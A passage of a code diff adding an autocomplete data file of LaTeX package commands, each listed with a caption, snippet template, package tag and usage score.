score: 0.0005078239917067089, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'glossary-longbooktabs-cmd', + score: 0.5473606021405326, + }, + { + caption: '\\array{}', + snippet: '\\array{$1}', + meta: 'glossary-longbooktabs-cmd', + score: 2.650484574842396e-5, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'glossary-longbooktabs-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\tabular{}', + snippet: '\\tabular{$1}', + meta: 'glossary-longbooktabs-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'glossary-longbooktabs-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\newcolumntype{}[]{}', + snippet: '\\newcolumntype{$1}[$2]{$3}', + meta: 'glossary-longbooktabs-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\newcolumntype{}{}', + snippet: '\\newcolumntype{$1}{$2}', + meta: 'glossary-longbooktabs-cmd', + score: 0.018615449342361392, + }, + ], + pgflibraryarrows: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'pgflibraryarrows-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + 
meta: 'pgflibraryarrows-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgflibraryarrows-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'pgflibraryarrows-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'pgflibraryarrows-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'pgflibraryarrows-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'pgflibraryarrows-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'pgflibraryarrows-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgflibraryarrows-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'pgflibraryarrows-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgflibraryarrows-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'pgflibraryarrows-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgflibraryarrows-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgflibraryarrows-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgflibraryarrows-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'pgflibraryarrows-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgflibraryarrows-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgflibraryarrows-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgflibraryarrows-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgflibraryarrows-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'pgflibraryarrows-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgflibraryarrows-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgflibraryarrows-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'pgflibraryarrows-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'pgflibraryarrows-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'pgflibraryarrows-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'pgflibraryarrows-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 
'pgflibraryarrows-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgflibraryarrows-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'pgflibraryarrows-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'pgflibraryarrows-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgflibraryarrows-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'pgflibraryarrows-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'pgflibraryarrows-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'pgflibraryarrows-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'pgflibraryarrows-cmd', + score: 0.2864294797053033, + }, + ], + soulpos: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'soulpos-cmd', + score: 0.00037306820619479756, + }, + ], + gmp: [ + { + caption: '\\par', + snippet: '\\par', + meta: 'gmp-cmd', + score: 0.413853376001159, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'gmp-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'gmp-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'gmp-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'gmp-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'gmp-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'gmp-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'gmp-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'gmp-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'gmp-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'gmp-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'gmp-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'gmp-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'gmp-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'gmp-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'gmp-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'gmp-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'gmp-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'gmp-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + 
snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'gmp-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'gmp-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'gmp-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'gmp-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'gmp-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'gmp-cmd', + score: 0.021170869458413965, + }, + ], + csvsimple: [ + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'csvsimple-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'csvsimple-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'csvsimple-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'csvsimple-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'csvsimple-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'csvsimple-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'csvsimple-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'csvsimple-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'csvsimple-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'csvsimple-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'csvsimple-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'csvsimple-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'csvsimple-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'csvsimple-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'csvsimple-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'csvsimple-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'csvsimple-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'csvsimple-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'csvsimple-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'csvsimple-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'csvsimple-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'csvsimple-cmd', + score: 
0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'csvsimple-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'csvsimple-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'csvsimple-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'csvsimple-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'csvsimple-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'csvsimple-cmd', + score: 0.008565354665444157, + }, + ], + ebgaramond: [ + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'ebgaramond-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'ebgaramond-cmd', + score: 0.008565354665444157, + }, + ], + boldline: [ + { + caption: '\\hlineB{}', + snippet: '\\hlineB{$1}', + meta: 'boldline-cmd', + score: 0.0009735563258863602, + }, + { + caption: '\\endtabular', + snippet: '\\endtabular', + meta: 'boldline-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'boldline-cmd', + score: 0.5473606021405326, + }, + { + caption: '\\array{}', + snippet: '\\array{$1}', + meta: 'boldline-cmd', + score: 2.650484574842396e-5, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'boldline-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\tabular{}', + snippet: '\\tabular{$1}', + meta: 'boldline-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'boldline-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\newcolumntype{}[]{}', + snippet: '\\newcolumntype{$1}[$2]{$3}', + meta: 'boldline-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\newcolumntype{}{}', + snippet: '\\newcolumntype{$1}{$2}', + meta: 'boldline-cmd', + score: 0.018615449342361392, + }, + ], + fontaxes: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'fontaxes-cmd', + score: 0.008565354665444157, + }, + ], + pbsi: [ + { + caption: '\\bsifamily', + snippet: '\\bsifamily', + meta: 'pbsi-cmd', + score: 3.140504277052775e-5, + }, + ], + 'tikz-qtree-compat': [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'tikz-qtree-compat-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tikz-qtree-compat-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tikz-qtree-compat-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'tikz-qtree-compat-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'tikz-qtree-compat-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'tikz-qtree-compat-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'tikz-qtree-compat-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'tikz-qtree-compat-cmd', + score: 
1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tikz-qtree-compat-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'tikz-qtree-compat-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikz-qtree-compat-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'tikz-qtree-compat-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tikz-qtree-compat-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tikz-qtree-compat-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tikz-qtree-compat-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'tikz-qtree-compat-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tikz-qtree-compat-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tikz-qtree-compat-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tikz-qtree-compat-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikz-qtree-compat-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'tikz-qtree-compat-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tikz-qtree-compat-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tikz-qtree-compat-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'tikz-qtree-compat-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'tikz-qtree-compat-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'tikz-qtree-compat-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'tikz-qtree-compat-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'tikz-qtree-compat-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tikz-qtree-compat-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'tikz-qtree-compat-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'tikz-qtree-compat-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikz-qtree-compat-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'tikz-qtree-compat-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'tikz-qtree-compat-cmd', + score: 
0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'tikz-qtree-compat-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'tikz-qtree-compat-cmd', + score: 0.2864294797053033, + }, + ], + 'ebgaramond-maths': [ + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'ebgaramond-maths-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'ebgaramond-maths-cmd', + score: 0.008565354665444157, + }, + ], + complexity: [ + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'complexity-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'complexity-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'complexity-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'complexity-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'complexity-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'complexity-cmd', + score: 0.0018957469739775527, + }, + ], + everysel: [ + { + caption: '\\selectfont', + snippet: '\\selectfont', + meta: 'everysel-cmd', + score: 0.04598628699063736, + }, + ], + txfontsb: [ + { + caption: '\\sqrt{}', + snippet: '\\sqrt{$1}', + meta: 'txfontsb-cmd', + score: 0.20240160977404634, + }, + ], + nath: [ + { + caption: '\\vert', + snippet: '\\vert', + meta: 'nath-cmd', + score: 0.05152912629788525, + }, + { + caption: '\\prod', + snippet: '\\prod', + meta: 'nath-cmd', + score: 0.02549889375975901, + }, + { + caption: '\\quad', + snippet: '\\quad', + meta: 'nath-cmd', + score: 0.15242755832392743, + }, + { + caption: '\\underbrace{}', + snippet: '\\underbrace{$1}', + meta: 'nath-cmd', + score: 0.010373780436850907, + }, + { + caption: '\\sum', + snippet: '\\sum', + meta: 'nath-cmd', + score: 0.42607994509619934, + }, + { + caption: '\\delimgrowth', + snippet: '\\delimgrowth', + meta: 'nath-cmd', + score: 1.8073688234300064e-5, + }, + { + caption: '\\frac{}{}', + snippet: '\\frac{$1}{$2}', + meta: 'nath-cmd', + score: 1.4341091141105058, + }, + { + caption: '\\overline{}', + snippet: '\\overline{$1}', + meta: 'nath-cmd', + score: 0.11280487530505384, + }, + { + caption: '\\underline{}', + snippet: '\\underline{$1}', + meta: 'nath-cmd', + score: 0.14748550887002482, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'nath-cmd', + score: 1.897791904799601, + }, + { + caption: '\\qquad', + snippet: '\\qquad', + meta: 'nath-cmd', + score: 0.0878145577017131, + }, + ], + vietnam: [ + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'vietnam-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'vietnam-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'vietnam-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'vietnam-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'vietnam-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'vietnam-cmd', + score: 
0.0018957469739775527, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'vietnam-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'vietnam-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'vietnam-cmd', + score: 0.021170869458413965, + }, + ], + answers: [ + { + caption: '\\endverbatim', + snippet: '\\endverbatim', + meta: 'answers-cmd', + score: 0.0022216421267780076, + }, + { + caption: '\\verbatim', + snippet: '\\verbatim', + meta: 'answers-cmd', + score: 0.0072203369120285256, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'answers-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'answers-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\par', + snippet: '\\par', + meta: 'answers-cmd', + score: 0.413853376001159, + }, + { + caption: '\\verbatiminput{}', + snippet: '\\verbatiminput{$1}', + meta: 'answers-cmd', + score: 0.0024547099784948665, + }, + { + caption: '\\verbatiminput', + snippet: '\\verbatiminput', + meta: 'answers-cmd', + score: 0.0024547099784948665, + }, + ], + attachfile: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'attachfile-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'attachfile-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'attachfile-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'attachfile-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\AtBeginShipout{}', + snippet: '\\AtBeginShipout{$1}', + meta: 'attachfile-cmd', + score: 0.00047530324346933345, + }, + { + caption: '\\AtBeginShipoutNext{}', + snippet: '\\AtBeginShipoutNext{$1}', + meta: 'attachfile-cmd', + score: 0.0005277905480209891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'attachfile-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\UrlBreaks{}', + snippet: '\\UrlBreaks{$1}', + meta: 'attachfile-cmd', + score: 0.001030592515645366, + }, + { + caption: '\\UrlBreaks', + snippet: '\\UrlBreaks', + meta: 'attachfile-cmd', + score: 0.001030592515645366, + }, + { + caption: '\\Url', + snippet: '\\Url', + meta: 'attachfile-cmd', + score: 0.0002854206807593436, + }, + { + caption: '\\UrlOrds{}', + snippet: '\\UrlOrds{$1}', + meta: 'attachfile-cmd', + score: 0.0006882563723629154, + }, + { + caption: '\\UrlOrds', + snippet: '\\UrlOrds', + meta: 'attachfile-cmd', + score: 0.0006882563723629154, + }, + { + caption: '\\urlstyle{}', + snippet: '\\urlstyle{$1}', + meta: 'attachfile-cmd', + score: 0.010515056688180681, + }, + { + caption: '\\urldef{}', + snippet: '\\urldef{$1}', + meta: 'attachfile-cmd', + score: 0.008041789461944983, + }, + { + caption: '\\UrlBigBreaks{}', + snippet: '\\UrlBigBreaks{$1}', + meta: 'attachfile-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\UrlFont{}', + snippet: '\\UrlFont{$1}', + meta: 'attachfile-cmd', + score: 0.0032990580087398644, + }, + { + caption: '\\UrlSpecials{}', + snippet: '\\UrlSpecials{$1}', + meta: 'attachfile-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\UrlNoBreaks', + snippet: '\\UrlNoBreaks', + meta: 'attachfile-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\nameref{}', + snippet: '\\nameref{$1}', + meta: 'attachfile-cmd', + 
score: 0.009472569279662113, + }, + { + caption: '\\pdfbookmark[]{}{}', + snippet: '\\pdfbookmark[$1]{$2}{$3}', + meta: 'attachfile-cmd', + score: 0.006492248863367502, + }, + { + caption: '\\figureautorefname', + snippet: '\\figureautorefname', + meta: 'attachfile-cmd', + score: 0.00014582556188448738, + }, + { + caption: '\\figureautorefname{}', + snippet: '\\figureautorefname{$1}', + meta: 'attachfile-cmd', + score: 0.00014582556188448738, + }, + { + caption: '\\numberwithin{}{}', + snippet: '\\numberwithin{$1}{$2}', + meta: 'attachfile-cmd', + score: 0.006963729684667191, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'attachfile-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'attachfile-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\footnoteautorefname', + snippet: '\\footnoteautorefname', + meta: 'attachfile-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\roman{}', + snippet: '\\roman{$1}', + meta: 'attachfile-cmd', + score: 0.005553384455935491, + }, + { + caption: '\\roman', + snippet: '\\roman', + meta: 'attachfile-cmd', + score: 0.005553384455935491, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'attachfile-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\MakeLowercase{}', + snippet: '\\MakeLowercase{$1}', + meta: 'attachfile-cmd', + score: 0.017289599800633146, + }, + { + caption: '\\textunderscore', + snippet: '\\textunderscore', + meta: 'attachfile-cmd', + score: 0.001509072212764015, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'attachfile-cmd', + score: 